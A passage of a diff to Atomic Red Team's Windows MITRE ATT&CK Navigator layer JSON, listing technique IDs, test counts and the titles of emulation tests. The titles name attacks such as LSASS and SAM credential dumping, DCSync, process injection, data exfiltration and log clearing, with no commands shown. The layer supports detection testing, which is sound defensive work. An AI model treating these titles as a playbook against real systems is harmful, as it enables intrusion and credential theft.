Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":2,"enabled":true,"comment":"\n- Discover System Language by Registry Query\n- Discover System Language with chcp\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"comment":"\n- Display group policy information via gpresult\n- Get-DomainGPO to display group policy information via PowerView\n- WinPwn - GPOAudit\n- WinPwn - GPORemoteAccessPolicy\n- MSFT Get-GPO Cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"comment":"\n- WinPwn - Reflectively load Mimik@tz into memory\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"comment":"\n- Staging Local Certificates via Export-Certificate\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]},{"techniqueID":"T1654","score":1,"enabled":true,"comment":"\n- Get-EventLog To Enumerate Windows Security Log\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1654/T1654.md"}]}]}
\ No newline at end of file
+{"name":"Atomic Red Team (Windows)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{"platforms":["Windows"]},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":39,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}],"comment":"\n- Gsecdump\n- Credential Dumping with NPPSpy\n- Dump svchost.exe to gather RDP credentials\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)\n- Dump Credential Manager using keymgr.dll and rundll32.exe\n"},{"techniqueID":"T1003.001","score":14,"enabled":true,"comment":"\n- Dump LSASS.exe Memory using ProcDump\n- Dump LSASS.exe Memory using comsvcs.dll\n- Dump LSASS.exe Memory using direct system calls and API unhooking\n- Dump LSASS.exe Memory using NanoDump\n- Dump LSASS.exe Memory using Windows Task Manager\n- Offline Credential Theft With Mimikatz\n- LSASS read with pypykatz\n- Dump LSASS.exe Memory using Out-Minidump.ps1\n- Create Mini Dump of LSASS.exe using ProcDump\n- Powershell Mimikatz\n- Dump LSASS with createdump.exe from .Net v5\n- Dump LSASS.exe using imported Microsoft DLLs\n- Dump LSASS.exe using lolbin rdrleakdiag.exe\n- Dump LSASS.exe Memory through Silent Process Exit\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"comment":"\n- Registry dump of SAM, creds, and secrets\n- Registry parse with pypykatz\n- esentutl.exe SAM copy\n- PowerDump Hashes and Usernames from Registry\n- dump volume shadow copy hives with certutil\n- dump volume shadow copy hives with System.IO.File\n- WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":8,"enabled":true,"comment":"\n- Create Volume Shadow Copy with vssadmin\n- Copy NTDS.dit from Volume Shadow Copy\n- Dump Active Directory Database with NTDSUtil\n- Create Volume Shadow Copy with WMI\n- Create Volume Shadow Copy remotely with WMI\n- Create Volume Shadow Copy remotely (WMI) with esentutl\n- Create Volume Shadow Copy with Powershell\n- Create Symlink to Volume Shadow Copy\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"comment":"\n- Dumping LSA Secrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"comment":"\n- Cached Credential Dump via Cmdkey\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"comment":"\n- DCSync (Active Directory)\n- Run DSInternals Get-ADReplAccount\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1005","score":1,"enabled":true,"comment":"\n- Search files of interest and save them to a single zip file (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"comment":"\n- Read volume boot sector via DOS device path (PowerShell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":2,"enabled":true,"comment":"\n- System Service Discovery\n- System Service Discovery - net.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"comment":"\n- List Process Main Windows - C# .NET\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"comment":"\n- Query Registry\n- Query Registry with Powershell cmdlets\n- Enumerate COM Objects in Registry with Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1016","score":7,"enabled":true,"comment":"\n- System Network Configuration Discovery on Windows\n- List Windows Firewall Rules\n- System Network Configuration Discovery (TrickBot Style)\n- List Open Egress Ports\n- Adfind - Enumerate Active Directory Subnet Objects\n- Qakbot Recon\n- DNS Server Discovery Using nslookup\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":15,"enabled":true,"comment":"\n- Remote System Discovery - net\n- Remote System Discovery - net group Domain Computers\n- Remote System Discovery - nltest\n- Remote System Discovery - ping sweep\n- Remote System Discovery - arp\n- Remote System Discovery - nslookup\n- Remote System Discovery - adidnsdump\n- Adfind - Enumerate Active Directory Computer Objects\n- Adfind - Enumerate Active Directory Domain Controller Objects\n- Enumerate domain computers within Active Directory using DirectorySearcher\n- Enumerate Active Directory Computers with Get-AdComputer\n- Enumerate Active Directory Computers with ADSISearcher\n- Get-DomainController with PowerView\n- Get-WmiObject to Enumerate Domain Controllers\n- Remote System Discovery - net group Domain Controller\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":1,"enabled":true,"comment":"\n- IcedID Botnet HTTP PUT\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":4,"enabled":true,"comment":"\n- RDP to DomainController\n- Changing RDP Port to Non Standard Port via Powershell\n- Changing RDP Port to Non Standard Port via Command_Prompt\n- Disable NLA for RDP via Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"comment":"\n- Map admin share\n- Map Admin Share PowerShell\n- Copy and Execute File with PsExec\n- Execute command writing output to local Admin Share\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":2,"enabled":true,"comment":"\n- PowerShell Lateral Movement using MMC20\n- PowerShell Lateral Movement Using Excel Application Object\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"comment":"\n- Enable Windows Remote Management\n- Remote Code Execution with PS Credentials Using Invoke-Command\n- WinRM Access with Evil-WinRM\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}],"comment":"\n- Execute base64-encoded PowerShell\n- Execute base64-encoded PowerShell from Windows Registry\n- Execution from Compressed File\n- DLP Evasion via Sensitive Data in VBA Macro over email\n- DLP Evasion via Sensitive Data in VBA Macro over HTTP\n- Obfuscated Command in PowerShell\n- Obfuscated Command Line using special Unicode characters\n- Snake Malware Encrypted crmlog file\n- Execution from Compressed JScript File\n"},{"techniqueID":"T1027.004","score":2,"enabled":true,"comment":"\n- Compile After Delivery using csc.exe\n- Dynamic C# Compile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"comment":"\n- HTML Smuggling Remote Payload\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1033","score":5,"enabled":true,"comment":"\n- System Owner/User Discovery\n- Find computers where user has session - Stealth mode (PowerView)\n- User Discovery With Env Vars PowerShell Script\n- GetCurrent User with PowerShell Script\n- System Discovery - SocGholish whoami\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}],"comment":"\n- System File Copied to Unusual Location\n- Malware Masquerading and Execution from Zip File\n"},{"techniqueID":"T1036.003","score":8,"enabled":true,"comment":"\n- Masquerading as Windows LSASS process\n- Masquerading - cscript.exe running as notepad.exe\n- Masquerading - wscript.exe running as svchost.exe\n- Masquerading - powershell.exe running as taskhostw.exe\n- Masquerading - non-windows exe running as windows exe\n- Masquerading - windows exe running as different windows exe\n- Malicious process Masquerading as LSM.exe\n- File Extension Masquerading\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":2,"enabled":true,"comment":"\n- Creating W32Time similar named service using schtasks\n- Creating W32Time similar named service using sc\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":1,"enabled":true,"comment":"\n- Masquerade as a built-in system executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1037","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"comment":"\n- Logon Scripts\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"comment":"\n- Copy a sensitive File over Administrative share with copy\n- Copy a sensitive File over Administrative share with Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":4,"enabled":true,"comment":"\n- Packet Capture Windows Command Prompt\n- Windows Internal Packet Capture\n- Windows Internal pktmon capture\n- Windows Internal pktmon set filter\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":1,"enabled":true,"comment":"\n- C2 Data Exfiltration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":7,"enabled":true,"comment":"\n- Port Scan NMap for Windows\n- Port Scan using python\n- WinPwn - spoolvulnscan\n- WinPwn - MS17-10\n- WinPwn - bluekeep\n- WinPwn - fruit\n- Port-Scanning /24 Subnet with PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"comment":"\n- WMI Reconnaissance Users\n- WMI Reconnaissance Processes\n- WMI Reconnaissance Software\n- WMI Reconnaissance List Remote Services\n- WMI Execute Local Process\n- WMI Execute Remote Process\n- Create a Process using WMI Query and an Encoded Command\n- Create a Process using obfuscated Win32_Process\n- WMI Execute rundll32\n- Application uninstall using WMIC\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}],"comment":"\n- DNSExfiltration (doh)\n"},{"techniqueID":"T1048.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data HTTPS using curl windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":5,"enabled":true,"comment":"\n- Exfiltration Over Alternative Protocol - ICMP\n- Exfiltration Over Alternative Protocol - HTTP\n- Exfiltration Over Alternative Protocol - SMTP\n- MAZE FTP Upload\n- Exfiltration Over Alternative Protocol - FTP - Rclone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":3,"enabled":true,"comment":"\n- System Network Connections Discovery\n- System Network Connections Discovery with PowerShell\n- System Discovery using SharpView\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":1,"enabled":true,"comment":"\n- At.exe Scheduled task\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.005","score":10,"enabled":true,"comment":"\n- Scheduled Task Startup Script\n- Scheduled task Local\n- Scheduled task Remote\n- Powershell Cmdlet Scheduled Task\n- Task Scheduler via VBA\n- WMI Invoke-CimMethod Scheduled Task\n- Scheduled Task Executing Base64 Encoded Commands From Registry\n- Import XML Schedule Task with Hidden Attribute\n- PowerShell Modify A Scheduled Task\n- Scheduled Task (\"Ghost Task\") via Registry Key Manipulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1055","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}],"comment":"\n- Shellcode execution via VBA\n- Remote Process Injection in LSASS via mimikatz\n- Section View Injection\n- Dirty Vanity process Injection\n- Read-Write-Execute process Injection\n- Process Injection with Go using UuidFromStringA WinAPI\n- Process Injection with Go using EtwpCreateEtwThread WinAPI\n- Remote Process Injection with Go using RtlCreateUserThread WinAPI\n- Remote Process Injection with Go using CreateRemoteThread WinAPI\n- Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively)\n- Process Injection with Go using CreateThread WinAPI\n- Process Injection with Go using CreateThread WinAPI (Natively)\n"},{"techniqueID":"T1055.001","score":2,"enabled":true,"comment":"\n- Process Injection via mavinject.exe\n- WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.002","score":1,"enabled":true,"comment":"\n- Portable Executable Injection\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.002/T1055.002.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"comment":"\n- Thread Execution Hijacking\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":3,"enabled":true,"comment":"\n- Process Injection via C#\n- EarlyBird APC Queue Injection in Go\n- Remote Process Injection with Go using NtQueueApcThreadEx WinAPI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.011","score":1,"enabled":true,"comment":"\n- Process Injection via Extra Window Memory (EWM) x64 executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.011/T1055.011.md"}]},{"techniqueID":"T1055.012","score":4,"enabled":true,"comment":"\n- Process Hollowing using PowerShell\n- RunPE via VBA\n- Process Hollowing in Go using CreateProcessW WinAPI\n- Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055.015","score":1,"enabled":true,"comment":"\n- Process injection ListPlanting\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.015/T1055.015.md"}]},{"techniqueID":"T1056","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":1,"enabled":true,"comment":"\n- Input Capture\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":1,"enabled":true,"comment":"\n- PowerShell - Prompt User for Password\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"comment":"\n- Hook PowerShell TLS Encrypt/Decrypt Messages\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":5,"enabled":true,"comment":"\n- Process Discovery - tasklist\n- Process Discovery - Get-Process\n- Process Discovery - get-wmiObject\n- Process Discovery - wmic process\n- Discover Specific Process - tasklist\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":33,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":22,"enabled":true,"comment":"\n- Mimikatz\n- Run BloodHound from local disk\n- Run Bloodhound from Memory using Download Cradle\n- Obfuscation Tests\n- Mimikatz - Cradlecraft PsSendKeys\n- Invoke-AppPathBypass\n- Powershell MsXml COM object - with prompt\n- Powershell XML requests\n- Powershell invoke mshta.exe download\n- Powershell Invoke-DownloadCradle\n- PowerShell Fileless Script Execution\n- PowerShell Downgrade Attack\n- NTFS Alternate Data Stream Access\n- PowerShell Session Creation and Use\n- ATHPowerShellCommandLineParameter -Command parameter variations\n- ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments\n- PowerShell Command Execution\n- PowerShell Invoke Known Malicious Cmdlets\n- PowerUp Invoke-AllChecks\n- Abuse Nslookup with DNS Records\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.003","score":6,"enabled":true,"comment":"\n- Create and Execute Batch Script\n- Writes text to a file and displays it.\n- Suspicious Execution via Windows Command Shell\n- Simulate BlackByte Ransomware Print Bombing\n- Command Prompt read contents from CMD file and execute\n- Command prompt writing script to file then executes it\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"comment":"\n- Visual Basic script execution to gather local computer information\n- Encoded VBS code execution\n- Extract Memory via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"comment":"\n- JScript execution to gather local computer information via cscript\n- JScript execution to gather local computer information via wscript\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":5,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Local)\n- Permission Groups Discovery PowerShell (Local)\n- SharpHound3 - LocalAdmin\n- Wmic Group Discovery\n- WMIObject Group Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":14,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Domain)\n- Permission Groups Discovery PowerShell (Domain)\n- Elevated group enumeration using net group (Domain)\n- Find machines where user has local admin access (PowerView)\n- Find local admins on all machines in domain (PowerView)\n- Find Local Admins via Group Policy (PowerView)\n- Enumerate Users Not Requiring Pre Auth (ASRepRoast)\n- Adfind - Query Active Directory Groups\n- Enumerate Active Directory Groups with Get-AdGroup\n- Enumerate Active Directory Groups with ADSISearcher\n- Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)\n- Get-DomainGroupMember with PowerView\n- Get-DomainGroup with PowerView\n- Active Directory Enumeration with LDIFDE\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}],"comment":"\n- Indicator Removal using FSUtil\n- Indicator Manipulation using FSUtil\n"},{"techniqueID":"T1070.001","score":3,"enabled":true,"comment":"\n- Clear Logs\n- Delete System Logs Using Clear-EventLog\n- Clear Event Logs via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.003","score":3,"enabled":true,"comment":"\n- Prevent Powershell History Logging\n- Clear Powershell History by Deleting History File\n- Set Custom AddToHistoryHandler to Avoid History File Logging\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":6,"enabled":true,"comment":"\n- Delete a single file - Windows cmd\n- Delete an entire folder - Windows cmd\n- Delete a single file - Windows PowerShell\n- Delete an entire folder - Windows PowerShell\n- Delete Prefetch File\n- Delete TeamViewer Log Files\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"comment":"\n- Add Network Share\n- Remove Network Share\n- Remove Network Share PowerShell\n- Disable Administrative Share Creation at Startup\n- Remove Administrative Shares\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":4,"enabled":true,"comment":"\n- Windows - Modify file creation timestamp with PowerShell\n- Windows - Modify file last modified timestamp with PowerShell\n- Windows - Modify file last access timestamp with PowerShell\n- Windows - Timestomp a File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":2,"enabled":true,"comment":"\n- Copy and Delete Mailbox Data on Windows\n- Copy and Modify Mailbox Data on Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":2,"enabled":true,"comment":"\n- Malicious User Agents - Powershell\n- Malicious User Agents - CMD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"comment":"\n- DNS Large Query Volume\n- DNS Regular Beaconing\n- DNS Long Domain Query\n- DNS C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"comment":"\n- Radmin Viewer Utility\n- PDQ Deploy RAT\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":2,"enabled":true,"comment":"\n- Stage data from Discovery.bat\n- Zip a Folder with PowerShell for Staging in Temp\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":2,"enabled":true,"comment":"\n- Enable Guest account with RDP capability and admin privileges\n- Activate Guest Account\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":3,"enabled":true,"comment":"\n- Create local account with admin privileges\n- WinPwn - Loot local Credentials - powerhell kittie\n- WinPwn - Loot local Credentials - Safetykatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1082","score":20,"enabled":true,"comment":"\n- System Information Discovery\n- Hostname Discovery (Windows)\n- Windows MachineGUID Discovery\n- Griffon Recon\n- Environment variables discovery on windows\n- WinPwn - winPEAS\n- WinPwn - itm4nprivesc\n- WinPwn - Powersploits privesc checks\n- WinPwn - General privesc checks\n- WinPwn - GeneralRecon\n- WinPwn - Morerecon\n- WinPwn - RBCD-Check\n- WinPwn - PowerSharpPack - Watson searching for missing windows patches\n- WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors\n- WinPwn - PowerSharpPack - Seatbelt\n- System Information Discovery with WMIC\n- Driver Enumeration using DriverQuery\n- System Information Discovery\n- Check computer location\n- BIOS Information Discovery through Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":4,"enabled":true,"comment":"\n- File and Directory Discovery (cmd.exe)\n- File and Directory Discovery (PowerShell)\n- Simulating MAZE Directory Enumeration\n- Launch DirLister Executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":3,"enabled":true,"comment":"\n- Enumerate all accounts on Windows (Local)\n- Enumerate all accounts via PowerShell (Local)\n- Enumerate logged on users via CMD (Local)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":22,"enabled":true,"comment":"\n- Enumerate all accounts (Domain)\n- Enumerate all accounts via PowerShell (Domain)\n- Enumerate logged on users via CMD (Domain)\n- Automated AD Recon (ADRecon)\n- Adfind -Listing password policy\n- Adfind - Enumerate Active Directory Admins\n- Adfind - Enumerate Active Directory User Objects\n- Adfind - Enumerate Active Directory Exchange AD Objects\n- Enumerate Default Domain Admin Details (Domain)\n- Enumerate Active Directory for Unconstrained Delegation\n- Get-DomainUser with PowerView\n- Enumerate Active Directory Users with ADSISearcher\n- Enumerate Linked Policies In ADSISearcher Discovery\n- Enumerate 